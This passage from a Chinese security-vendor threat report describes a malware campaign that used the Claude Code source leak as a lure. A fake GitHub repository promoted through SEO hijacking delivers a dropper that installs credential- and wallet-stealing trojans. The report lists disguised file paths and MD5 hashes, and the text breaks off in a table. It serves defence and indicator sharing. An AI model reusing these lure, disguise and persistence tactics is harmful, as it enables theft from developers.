  <p>源码泄露的黄金48小时，攻击者用“官方泄露版”在GitHub埋下伏笔。开发者好奇搜索，便落入商业窃密木马的陷阱，浏览器密码、加密货币钱包瞬间沦陷。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><h2 data-line="0" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 0px auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">一、概述</span></h2><p data-line="2" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">2026年3月31日，Anthropic 旗舰终端 AI 编程代理 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Claude Code</span></strong><span leaf=""> 因打包错误，意外泄露了约 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">51.3万行</span></strong><span leaf="">未混淆的 TypeScript 源代码。泄露代码迅速被镜像至 GitHub，数千个 Fork 涌现，部分仓库星标突破 8.4万。尽管 Anthropic 紧急发出 DMCA 删除通知，代码已在数百个公共仓库中广泛传播。</span></p><p data-line="4" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">攻击者闻风而动。</span></strong><span leaf=""> 腾讯安全科恩实验室威胁情报团队在安全运营中捕获到一起利用此次泄露事件作为诱饵的 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Git 仓库投毒攻击</span></strong><span leaf="">——攻击者在 GitHub 创建名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">leaked-claude-code</span></code><span leaf=""> 的伪装仓库，通过 SEO 劫持将恶意链接推送至搜索引擎顶部，诱导好奇的开发者下载含有恶意 Release 的压缩包。一旦运行，受害主机将被植入</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">多款商业窃密木马</span></strong><span leaf="">，包括 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PureLogs Stealer</span></strong><span leaf=""> 和 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AuraStealer</span></strong><span leaf="">，实现浏览器凭据、加密货币钱包、2FA 令牌等敏感资产的全面窃取。</span></p><p data-line="6" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这是一次典型的 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">&#34;热点事件 + 供应链投毒&#34;</span></strong><span leaf=""> 组合拳——攻击者精准把握开发者群体的好奇心理，将高关注度安全事件转化为大规模攻击入口。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="10" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">二、事件背景：Claude Code 源码泄露始末</span></h2><h3 data-line="12" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.1 泄露经过</span></h3><p data-line="14" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">2026年3月31日，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">npm</span></code><span leaf=""> 包 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">@anthropic-ai/claude-code</span></code><span leaf=""> 版本 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2.1.88</span></strong><span leaf=""> 中意外包含了一个 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">59.8 MB</span></strong><span leaf=""> 的 JavaScript Source Map（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.map</span></code><span leaf="">）文件，该文件引用了托管于 Anthropic Cloudflare R2 存储桶上的完整 TypeScript 源码 ZIP 包，共涉及 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">1,906 个源文件</span></strong><span leaf="">。</span></p><h3 data-line="16" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2.2 泄露扩散与攻击者借势</span></h3><p data-line="18" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">泄露代码迅速在开发者社区引发轩然大波：GitHub 上数千个 Fork 涌现，部分镜像仓库星标突破 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">8.4 万</span></strong><span leaf="">，&#34;leaked Claude Code&#34; 成为 Google 热搜关键词。尽管 Anthropic 在数小时内发出 DMCA 删除通知，代码已在数百个公共仓库中广泛传播，完全无法收回。</span></p><p data-line="20" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">攻击者精准捕捉到了这一窗口期。</span></strong><span leaf=""> 高关注度 + 开发者群体的强烈好奇心 = 绝佳的社会工程入口。攻击者迅速注册 GitHub 账户、搭建伪装仓库、优化 SEO 排名，将&#34;搜索泄露代码&#34;这一行为直接转化为恶意载荷的分发渠道——从泄露事件发生到投毒仓库上线，整个过程不超过 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">48 小时</span></strong><span leaf="">。 截至2026.4.3早晨（北京时间），该投毒项目已经被fork 800多次，star数超过600，呈现加速扩散趋势。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5194444444444445" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027947" src="https://wechat2rss.xlab.app/img-proxy/?k=2753d1e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUsICvjmAQIvjZ6PMm1qH20k4PDGoI1peGUMVYYM6PGKxk6icUZEiaicPBibF2RSLy9iabyCKJoqEkOhFibDgJ3N3W5963pm4gCIp1DI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="25" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">三、攻击链分析</span></h2><p data-line="27" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者利用 Claude Code 源码泄露事件作为社会工程诱饵，构建了一条完整的攻击链：</span></p><figure data-line="29" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" alt="攻击链示意图" class="rich_pages wxw-img" data-ratio="1" data-type="png" data-w="1024" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027949" src="https://wechat2rss.xlab.app/img-proxy/?k=e6c529d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWf381G5CyZWUYAAeE8fA3JuaqZ86Ex2WVLrlaw51WJqvUmibw3uUnqYqqFeNibic9W9WaY992FeQQpcCPjrMhiabjpG2EdGOPTILU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">攻击链示意图</span></figcaption></figure><h3 data-line="32" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.1 诱饵投放</span></h3><p data-line="34" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者在 GitHub 创建名为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">leaked-claude-code</span></code></strong><span leaf=""> 的仓库，声称包含泄露的 TypeScript 源码并&#34;解锁了企业版功能&#34;。仓库 Release 区提供名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Claude Code - Leaked Source Code.7z</span></code><span leaf=""> 的压缩包作为恶意载荷分发入口。恶意仓库 README 页面，使用醒目的下载按钮诱导用户操作，并伪装为&#34;安全研究工具&#34;：</span></p><figure data-line="36" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6055555555555555" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027948" src="https://wechat2rss.xlab.app/img-proxy/?k=91b4f3af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUyYpo8HVJ5s05WLVOsF31pnTlPgznUwoT5eJPyKH3HMTYQCWstQ2EnmKprSGiap75g5eavU8JHwe1XLEYRtt1NnsySBhvWozwQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="38" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">恶意仓库 Release 页面，提供 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ClaudeCode_x64.7z</span></code><span leaf="">（114 MB）压缩包下载：</span></p><figure data-line="40" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.512962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027946" src="https://wechat2rss.xlab.app/img-proxy/?k=f9c74e7d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXJjE49zlHP1Wx8viaj26DjlQpdicxicGnNpdvhXAicibOVEJicaSvoTcu0I2iaEyEEel0I0zZYGIe5Vwd24MzecgmicgyiafMOSQr8q060%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h3 data-line="42" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.2 SEO 劫持</span></h3><p data-line="44" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">恶意仓库链接被优化至 Google 搜索 &#34;leaked Claude Code&#34; 结果的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">顶部位置</span></strong><span leaf="">，精准命中因好奇心驱动搜索泄露代码的开发者群体。</span></p><h3 data-line="46" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.3 载荷释放</span></h3><p data-line="48" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">用户下载并解压后运行 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ClaudeCode_x64.exe</span></code><span leaf="">（基于 Rust 的 Dropper，124 MB），母体运行后会释放大量恶意文件至系统多个隐蔽目录。部分文件功能相似，主要为</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">商业远控窃密后门</span></strong><span leaf="">，通过伪装成系统服务、驱动组件等合法程序名称进行驻留。</span></p><p data-line="50" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ClaudeCode_x64.exe</span></code><span leaf=""> 文件属性（描述伪装为 &#34;AI analysis and predictive modeling toolkit&#34;）：</span></p><figure data-line="52" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6906474820143885" data-type="png" data-w="695" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027945" src="https://wechat2rss.xlab.app/img-proxy/?k=9256c847&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWkib31E1aHorjMwMJtaRicoh5eP91IBHaibYzqdmbETyaEG3dFEJOC8ay3P9YoWr8ph4Y2warLkPrTbujJPuGEM3jjkaiax43UBiaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="59" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">四、释放文件与样本分析</span></h2><h3 data-line="61" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.1 释放文件清单</span></h3><p data-line="63" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">母体运行后释放的恶意文件分布在多个系统路径下，刻意伪装为常见系统服务或知名软件组件，经分析，均为窃密商业远程控制类，后举例分析说明：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件路径</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Music\ServiceAgent\UpdateService\autodrive.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">936B37CC8337B0B48C59C60381BC13AE</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Videos\NetworkModule\NetworkProcess\WinHealhCare.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Documents\GraphicsAdapter\WindowsManager\OneSync.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">397405106D895815A9BEF8D84445AF5A</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Music\ServiceService\MicrosoftSupport\localvideo.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">9A6EA91491CCB1068B0592402029527F</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\admin\AppData\Roaming\Roaming\Data\Config\manager.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F01E96A80F92C414DD824AEF5A1AC1E7</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Pictures\DriverController\IntelComponent\svc_service.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F9A25264ECF9013D2639875CE7F314CB</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\ProgramData\Adobe\AdobeCloudSync.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\ProgramData\Google\ChromeSyncHost.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\OneDriveSync.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\ProgramData\Intel\IntelGraphicsHost.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\svc_host.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F9A25264ECF9013D2639875CE7F314CB</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Pictures\DeviceService\NetworkAgent\onedrive_sync.exe</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F01E96A80F92C414DD824AEF5A1AC1E7</span></code></td></tr></tbody></table></p><p data-line="80" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">多个文件共享相同 MD5，表明攻击者通过&#34;同一载荷、多路径冗余投放&#34;策略提高持久化成功率。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="84" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.2 样本一：OneSync.exe — 下载器 + 持久化 + 反分析</span></h3><p data-line="86" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">文件信息</span></strong></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:176px;"><thead><tr><th data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">属性</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值</span></p></th></tr></thead><tbody><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">路径</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Documents\GraphicsAdapter\WindowsManager\OneSync.exe</span></code></td></tr><tr><td 